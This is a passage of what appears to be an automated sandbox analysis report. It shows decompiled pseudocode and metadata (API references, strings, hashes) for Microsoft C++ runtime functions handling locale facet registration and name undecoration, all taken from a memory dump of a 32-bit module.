																																																if(__eflags == 0) {
																																																	E6D461438(_t858 - 0x20);
																																																	E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e83cf, _t606, _t813, _t833, 0x14);
																																																	E6D486653(_t858 - 0x14, 0);
																																																	_t834 =  *0x6d546dfc; // 0x0
																																																	 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																	 *(_t858 - 0x10) = _t834;
																																																	_t474 = E6D46161C(0x6d546da8);
																																																	_t714 =  *((intOrPtr*)(_t858 + 8));
																																																	_t814 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t474);
																																																	__eflags = _t814;
																																																	if(_t814 != 0) {
																																																		L110:
																																																		E6D4866BA(_t858 - 0x14);
																																																		return E6D4A0075(_t814);
																																																	} else {
																																																		__eflags = _t834;
																																																		if(_t834 == 0) {
																																																			_push( *((intOrPtr*)(_t858 + 8)));
																																																			_push(_t858 - 0x10);
																																																			__eflags = E6D4914EC(_t606, _t714, _t797, _t814, _t834) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6D461438(_t858 - 0x20);
																																																				E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																																				asm("int3");
																																																				E6D4A00AC(0x6d4e83cf, _t606, _t814, _t834, 0x14);
																																																				E6D486653(_t858 - 0x14, 0);
																																																				_t835 =  *0x6d546dcc; // 0x0
																																																				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																				 *(_t858 - 0x10) = _t835;
																																																				_t487 = E6D46161C(0x6d546d80);
																																																				_t721 =  *((intOrPtr*)(_t858 + 8));
																																																				_t815 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t487);
																																																				__eflags = _t815;
																																																				if(_t815 != 0) {
																																																					L117:
																																																					E6D4866BA(_t858 - 0x14);
																																																					return E6D4A0075(_t815);
																																																				} else {
																																																					__eflags = _t835;
																																																					if(_t835 == 0) {
																																																						_push( *((intOrPtr*)(_t858 + 8)));
																																																						_push(_t858 - 0x10);
																																																						__eflags = E6D491558(_t606, _t721, _t797, _t815, _t835) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6D461438(_t858 - 0x20);
																																																							E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																																							asm("int3");
																																																							E6D4A00AC(0x6d4e83cf, _t606, _t815, _t835, 0x14);
																																																							E6D486653(_t858 - 0x14, 0);
																																																							_t836 =  *0x6d546e00; // 0x0
																																																							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																							 *(_t858 - 0x10) = _t836;
																																																							_t500 = E6D46161C(0x6d546dac);
																																																							_t728 =  *((intOrPtr*)(_t858 + 8));
																																																							_t816 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t500);
																																																							__eflags = _t816;
																																																							if(_t816 != 0) {
																																																								L124:
																																																								E6D4866BA(_t858 - 0x14);
																																																								return E6D4A0075(_t816);
																																																							} else {
																																																								__eflags = _t836;
																																																								if(_t836 == 0) {
																																																									_push( *((intOrPtr*)(_t858 + 8)));
																																																									_push(_t858 - 0x10);
																																																									__eflags = E6D4915C4(_t606, _t728, _t797, _t816, _t836) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6D461438(_t858 - 0x20);
																																																										E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																																										asm("int3");
																																																										E6D4A00AC(0x6d4e83cf, _t606, _t816, _t836, 0x14);
																																																										E6D486653(_t858 - 0x14, 0);
																																																										_t837 =  *0x6d546dd0; // 0x0
																																																										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																										 *(_t858 - 0x10) = _t837;
																																																										_t513 = E6D46161C(0x6d546d60);
																																																										_t735 =  *((intOrPtr*)(_t858 + 8));
																																																										_t817 = E6D46171B( *((intOrPtr*)(_t858 + 8)), _t513);
																																																										__eflags = _t817;
																																																										if(_t817 != 0) {
																																																											L131:
																																																											E6D4866BA(_t858 - 0x14);
																																																											return E6D4A0075(_t817);
																																																										} else {
																																																											__eflags = _t837;
																																																											if(_t837 == 0) {
																																																												_push( *((intOrPtr*)(_t858 + 8)));
																																																												_push(_t858 - 0x10);
																																																												__eflags = E6D49162A(_t606, _t735, _t797, _t817, _t837) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													_t739 = _t858 - 0x20;
																																																													E6D461438(_t739);
																																																													E6D4A3D74(_t858 - 0x20, 0x6d543504);
																																																													asm("int3");
																																																													E6D4A00AC(0x6d4e851f, _t606, _t817, _t837, 4);
																																																													_t838 = _t739;
																																																													 *(_t858 - 0x10) = _t838;
																																																													 *((intOrPtr*)(_t838 + 4)) =  *((intOrPtr*)(_t858 + 0xc));
																																																													_push( *((intOrPtr*)(_t858 + 0x14)));
																																																													_t273 = _t858 - 4;
																																																													 *_t273 =  *(_t858 - 4) & 0x00000000;
																																																													__eflags =  *_t273;
																																																													 *_t838 = 0x6d4ec0c4;
																																																													 *((char*)(_t838 + 0x28)) =  *((intOrPtr*)(_t858 + 0x10));
																																																													E6D49542F(_t606, _t739, _t797, _t817, _t838,  *_t273);
																																																													return E6D4A0075(_t838,  *((intOrPtr*)(_t858 + 8)));
																																																												} else {
																																																													_t817 =  *(_t858 - 0x10);
																																																													 *(_t858 - 0x10) = _t817;
																																																													 *(_t858 - 4) = 1;
																																																													E6D486FD3(__eflags, _t817);
																																																													 *0x6d4ea26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t817 + 4))))();
																																																													 *0x6d546dd0 = _t817;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t817 = _t837;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t816 =  *(_t858 - 0x10);
																																																										 *(_t858 - 0x10) = _t816;
																																																										 *(_t858 - 4) = 1;
																																																										E6D486FD3(__eflags, _t816);
																																																										 *0x6d4ea26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t816 + 4))))();
																																																										 *0x6d546e00 = _t816;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t816 = _t836;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t815 =  *(_t858 - 0x10);
																																																							 *(_t858 - 0x10) = _t815;
																																																							 *(_t858 - 4) = 1;
																																																							E6D486FD3(__eflags, _t815);
																																																							 *0x6d4ea26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t815 + 4))))();
																																																							 *0x6d546dcc = _t815;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t815 = _t835;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t814 =  *(_t858 - 0x10);
																																																				 *(_t858 - 0x10) = _t814;
																																																				 *(_t858 - 4) = 1;
																																																				E6D486FD3(__eflags, _t814);
																																																				 *0x6d4ea26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t814 + 4))))();
																																																				 *0x6d546dfc = _t814;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t814 = _t834;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t813 =  *(_t858 - 0x10);
																																																	 *(_t858 - 0x10) = _t813;
																																																	 *(_t858 - 4) = 1;
																																																	E6D486FD3(__eflags, _t813);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t813 + 4))))();
																																																	 *0x6d546de0 = _t813;
																																																	goto L103;
																																																}
																																															} else {
																																																_t813 = _t833;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t812 =  *(_t858 - 0x10);
																																														 *(_t858 - 0x10) = _t812;
																																														 *(_t858 - 4) = 1;
																																														E6D486FD3(__eflags, _t812);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t812 + 4))))();
																																														 *0x6d546ddc = _t812;
																																														goto L96;
																																													}
																																												} else {
																																													_t812 = _t832;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t811 =  *(_t858 - 0x10);
																																											 *(_t858 - 0x10) = _t811;
																																											 *(_t858 - 4) = 1;
																																											E6D486FD3(__eflags, _t811);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t811 + 4))))();
																																											 *0x6d546db0 = _t811;
																																											goto L89;
																																										}
																																									} else {
																																										_t811 = _t831;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t810 =  *(_t858 - 0x10);
																																								 *(_t858 - 0x10) = _t810;
																																								 *(_t858 - 4) = 1;
																																								E6D486FD3(__eflags, _t810);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t810 + 4))))();
																																								 *0x6d546dd8 = _t810;
																																								goto L82;
																																							}
																																						} else {
																																							_t810 = _t830;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t809 =  *(_t858 - 0x10);
																																					 *(_t858 - 0x10) = _t809;
																																					 *(_t858 - 4) = 1;
																																					E6D486FD3(__eflags, _t809);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t809 + 4))))();
																																					 *0x6d546dc4 = _t809;
																																					goto L75;
																																				}
																																			} else {
																																				_t809 = _t829;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t808 =  *(_t858 - 0x10);
																																		 *(_t858 - 0x10) = _t808;
																																		 *(_t858 - 4) = 1;
																																		E6D486FD3(__eflags, _t808);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t808 + 4))))();
																																		 *0x6d546dc8 = _t808;
																																		goto L68;
																																	}
																																} else {
																																	_t808 = _t828;
																																	goto L68;
																																}
																															}
																														} else {
																															_t807 =  *(_t858 - 0x10);
																															 *(_t858 - 0x10) = _t807;
																															 *(_t858 - 4) = 1;
																															E6D486FD3(__eflags, _t807);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t807 + 4))))();
																															 *0x6d546df4 = _t807;
																															goto L61;
																														}
																													} else {
																														_t807 = _t827;
																														goto L61;
																													}
																												}
																											} else {
																												_t806 =  *(_t858 - 0x10);
																												 *(_t858 - 0x10) = _t806;
																												 *(_t858 - 4) = 1;
																												E6D486FD3(__eflags, _t806);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t806 + 4))))();
																												 *0x6d546df8 = _t806;
																												goto L54;
																											}
																										} else {
																											_t806 = _t826;
																											goto L54;
																										}
																									}
																								} else {
																									_t805 =  *(_t858 - 0x10);
																									 *(_t858 - 0x10) = _t805;
																									 *(_t858 - 4) = 1;
																									E6D486FD3(__eflags, _t805);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t805 + 4))))();
																									 *0x6d546dc0 = _t805;
																									goto L47;
																								}
																							} else {
																								_t805 = _t825;
																								goto L47;
																							}
																						}
																					} else {
																						_t804 =  *(_t858 - 0x10);
																						 *(_t858 - 0x10) = _t804;
																						 *(_t858 - 4) = 1;
																						E6D486FD3(__eflags, _t804);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t804 + 4))))();
																						 *0x6d546df0 = _t804;
																						goto L40;
																					}
																				} else {
																					_t804 = _t824;
																					goto L40;
																				}
																			}
																		} else {
																			_t803 =  *(_t858 - 0x10);
																			 *(_t858 - 0x10) = _t803;
																			 *(_t858 - 4) = 1;
																			E6D486FD3(__eflags, _t803);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t803 + 4))))();
																			 *0x6d546dbc = _t803;
																			goto L33;
																		}
																	} else {
																		_t803 = _t823;
																		goto L33;
																	}
																}
															} else {
																_t802 =  *(_t858 - 0x10);
																 *(_t858 - 0x10) = _t802;
																 *(_t858 - 4) = 1;
																E6D486FD3(__eflags, _t802);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t802 + 4))))();
																 *0x6d546dec = _t802;
																goto L26;
															}
														} else {
															_t802 = _t822;
															goto L26;
														}
													}
												} else {
													_t801 =  *(_t858 - 0x10);
													 *(_t858 - 0x10) = _t801;
													 *(_t858 - 4) = 1;
													E6D486FD3(__eflags, _t801);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t801 + 4))))();
													 *0x6d546db8 = _t801;
													goto L19;
												}
											} else {
												_t801 = _t821;
												goto L19;
											}
										}
									} else {
										_t800 =  *(_t858 - 0x10);
										 *(_t858 - 0x10) = _t800;
										 *(_t858 - 4) = 1;
										E6D486FD3(__eflags, _t800);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t800 + 4))))();
										 *0x6d546de8 = _t800;
										goto L12;
									}
								} else {
									_t800 = _t820;
									goto L12;
								}
							}
						} else {
							_t799 =  *(_t858 - 0x10);
							 *(_t858 - 0x10) = _t799;
							 *(_t858 - 4) = 1;
							E6D486FD3(__eflags, _t799);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t799 + 4))))();
							 *0x6d546dd4 = _t799;
							goto L5;
						}
					} else {
						_t799 = _t819;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F0E4
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F0EE
int.LIBCPMT ref: 6D48F105

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

ctype.LIBCPMT ref: 6D48F128
std::_Facet_Register.LIBCPMT ref: 6D48F13F
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F15F
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F17D

Strings

(kTm, xrefs: 6D48F0F9

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: (kTm
API String ID: 1394824916-3985963449
Opcode ID: 0d33d02941780335d9b99bf0e3768e6e3eb58aa5cbbb9ea31071595c6d58318c
Instruction ID: e92bad2d6b6568bd2e3cf2e62f7e587d203b9640376d8a479657d1125a408ab3
Opcode Fuzzy Hash: 0d33d02941780335d9b99bf0e3768e6e3eb58aa5cbbb9ea31071595c6d58318c
Instruction Fuzzy Hash: 9911E0758082299BCF05EBA0C840FEEBBB5AF94315F2A400CD611BB392CB74ED0087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48A0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48A0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653( &_v20, 0);
				_t178 =  *0x6d546cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6D46161C(0x6d546b38);
				_t133 = _a8;
				_t64 = E6D46171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6D4866BA( &_v20);
					return E6D4A0075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6D48A9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438( &_v32);
							E6D4A3D74( &_v32, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t173, _t178, 0x14);
							E6D486653( &_v20, 0);
							_t179 =  *0x6d546ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6D46161C(0x6d546cb8);
							_t140 = _a8;
							_t174 = E6D46171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6D4866BA( &_v20);
								return E6D4A0075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6D48AA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438( &_v32);
										E6D4A3D74( &_v32, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t130, _t174, _t179, 0x14);
										E6D486653( &_v20, 0);
										_t180 =  *0x6d546cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6D46161C(0x6d546cbc);
										_t147 = _a8;
										_t175 = E6D46171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6D4866BA( &_v20);
											return E6D4A0075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6D48AAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438( &_v32);
													E6D4A3D74( &_v32, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t130, _t175, _t180, 0x14);
													E6D486653( &_v20, 0);
													_t181 =  *0x6d546cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6D46161C(0x6d546cc0);
													_t154 = _a8;
													_t176 = E6D46171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6D4866BA( &_v20);
														return E6D4A0075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6D48AB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6D461438(_t158);
																E6D4A3D74( &_v32, 0x6d543504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6d4eba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6D486FD3(__eflags, _t176);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6d546cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6D486FD3(__eflags, _t175);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6d546cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6D486FD3(__eflags, _t174);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6d546ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6D486FD3(__eflags, _t173);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6d546cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48A106
std::_Lockit::_Lockit.LIBCPMT ref: 6D48A110
int.LIBCPMT ref: 6D48A127

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

ctype.LIBCPMT ref: 6D48A14A
std::_Facet_Register.LIBCPMT ref: 6D48A161
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A181
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48A19F

Strings

8kTm, xrefs: 6D48A11B

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: 8kTm
API String ID: 1394824916-3180178982
Opcode ID: 9e949b17c694e80ecd5b4b8aae4975990f00f128cf10934b2c09acc2cc38fecb
Instruction ID: 8843d63abd8b53b2ece52169233878849d5d558bf860ab68422f048030327f48
Opcode Fuzzy Hash: 9e949b17c694e80ecd5b4b8aae4975990f00f128cf10934b2c09acc2cc38fecb
Instruction Fuzzy Hash: E611CE758082199BCF01EBA4C841EEDB7B5AF90355F2A400CD611A73D5DFB4DE0087E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A735D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4A735D(void* __eflags, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				intOrPtr _t17;
				intOrPtr* _t20;
				void* _t22;
				void* _t25;
				signed int* _t30;
				intOrPtr* _t33;
				void* _t42;

				E6D4A5A6C( &_v12, E6D4A614D(0));
				_t33 =  *0x6d547218; // 0x0
				_t17 =  *_t33;
				if(_t17 == 0) {
					E6D4A6052( &_v12, 1);
					goto L8;
				} else {
					 *0x6d547218 = _t33 + 1;
					_t22 = _t17 - 0x30;
					if(_t22 == 0) {
						E6D4A5FF1( &_v12, "void");
						goto L8;
					} else {
						_t25 = _t22;
						if(_t25 == 0) {
							E6D4A5EFB( &_v12, E6D4A9DB3(_t42, __eflags,  &_v20));
							goto L8;
						} else {
							if(_t25 != 3) {
								L8:
								E6D4A5FF1( &_v12, ") ");
								_t20 = _a4;
								 *_t20 = _v12;
								 *((intOrPtr*)(_t20 + 4)) = _v8;
								return _t20;
							} else {
								_t30 = _a4;
								_t30[1] = _t30[1] & 0x00000000;
								 *_t30 =  *_t30 & 0x00000000;
								_t30[1] = 2;
								return _t30;
							}
						}
					}
				}
			}

APIs

UnDecorator::UScore.LIBVCRUNTIME ref: 6D4A7365
DName::DName.LIBVCRUNTIME ref: 6D4A736F

Part of subcall function 6D4A5A6C: DName::doPchar.LIBVCRUNTIME ref: 6D4A5A93

UnDecorator::getScopedName.LIBVCRUNTIME ref: 6D4A73AE
DName::operator+=.LIBVCRUNTIME ref: 6D4A73B8
DName::operator+=.LIBCMT ref: 6D4A73C7
DName::operator+=.LIBCMT ref: 6D4A73D3
DName::operator+=.LIBCMT ref: 6D4A73E0

Strings

void, xrefs: 6D4A73BF

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 844413a5eda8532a707555e99088371fae25cc64d1de06819478ec1beb01208f
Instruction ID: 6b19afc7dc6de8c9c3d751b8ca9722114b6000cd34579f43745bde6ffaac4d05
Opcode Fuzzy Hash: 844413a5eda8532a707555e99088371fae25cc64d1de06819478ec1beb01208f
Instruction Fuzzy Hash: 45118E31908244AFCB04DF68C554FBDBB74AB21308F5A849CE9019B6DADBB0AE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D48F229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t770 - 0x14, 0);
				_t735 =  *0x6d546db8; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6D46161C(0x6d546d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6D4866BA(_t770 - 0x14);
					return E6D4A0075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6D490F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t770 - 0x20);
							E6D4A3D74(_t770 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t717, _t735, 0x14);
							E6D486653(_t770 - 0x14, 0);
							_t736 =  *0x6d546dec; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6D46161C(0x6d546d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6D4866BA(_t770 - 0x14);
								return E6D4A0075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6D490F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t770 - 0x20);
										E6D4A3D74(_t770 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t544, _t718, _t736, 0x14);
										E6D486653(_t770 - 0x14, 0);
										_t737 =  *0x6d546dbc; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6D46161C(0x6d546d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6D4866BA(_t770 - 0x14);
											return E6D4A0075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6D490FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t770 - 0x20);
													E6D4A3D74(_t770 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t544, _t719, _t737, 0x14);
													E6D486653(_t770 - 0x14, 0);
													_t738 =  *0x6d546df0; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6D46161C(0x6d546d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6D46171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6D4866BA(_t770 - 0x14);
														return E6D4A0075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6D491057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t770 - 0x20);
																E6D4A3D74(_t770 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t544, _t720, _t738, 0x14);
																E6D486653(_t770 - 0x14, 0);
